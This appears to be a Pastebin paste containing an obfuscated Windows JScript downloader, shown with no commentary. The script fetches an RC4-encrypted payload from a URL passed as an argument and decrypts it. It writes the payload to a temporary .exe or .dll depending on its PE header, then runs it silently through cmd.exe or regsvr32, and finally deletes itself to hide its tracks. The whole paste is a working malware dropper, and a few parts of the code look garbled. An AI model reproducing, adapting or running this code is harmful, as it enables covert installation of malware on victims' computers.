Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- l=function(n,g){
- for(var c=0,s=String,d,b=[],i=[],r=255,a=0;256>a;a++)
- b[a]=a;
- for(a=0;256>a;a++)
- c=c+b[a]+g[v](ag.length)&r,d=b[a],b[a]=b[c],b[c]=d;
- for(var e=c=a=0,p="push";e<n.length;e++)
- a=a+1&r,c=c+b[a]&r,d=b[a],b[a]=b[c],b[c]=d,i[p](s.fromCharCode(n[v](e)^b[b[a]+b[c]&r]));
- return i[u(15)](u(11))
- };
- I="WinHTTPZRequest.5.1ZGETZScripting.FileSystemObjectZWScript.ShellZADODB.StreamZeroZ.ex",u=function(i){return I["split"]("Z")[i]},f=ActiveXObject;
- try{
- I+="eZGetTempNameZcharCodeAtZiso-8859-1ZZindexOfZ.dllZScriptFullNameZjoinZrunZ /c Z /s ";
- function o(b){
- return new f(b)
- };
- function g1(g){
- var t=o("WinHTTP"+"."+"WinHTTP"+"Request.5.1");
- t.setProxy(n);
- t.open("GET",g(1),n);
- t.Option(0)=g(2);
- t.send();
- if(0310==t.status)
- return l(t["responseText"],g(n))
- };
- var q=o("Scripting.FileSystemObject"),m=WScript.Arguments,j=o("WScript.Shell"),s=o("ADODB.Stream"),p=".exe",n=0,L=WScript["ScriptFullName"],v="charCodeAt";
- s.Type=2;
- c=q["GetTempName"]();
- s.Charset="iso-8859-1";
- s.Open();
- i=g1(m);d=i[v](i["indexOf"]("PE\x00\x00")+23);
- s["WriteText"](i);
- if(037<d){
- var z=1;
- c+=".dll"
- }else c+=".exe";
- s["savetofile"](c,2);
- s.Close();
- z&&(c="regsvr32.exe /s "+c);
- j["run"]("cmd.exe /c "+c,0)
- }catch(y1){}
- q["Deletefile"](L);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement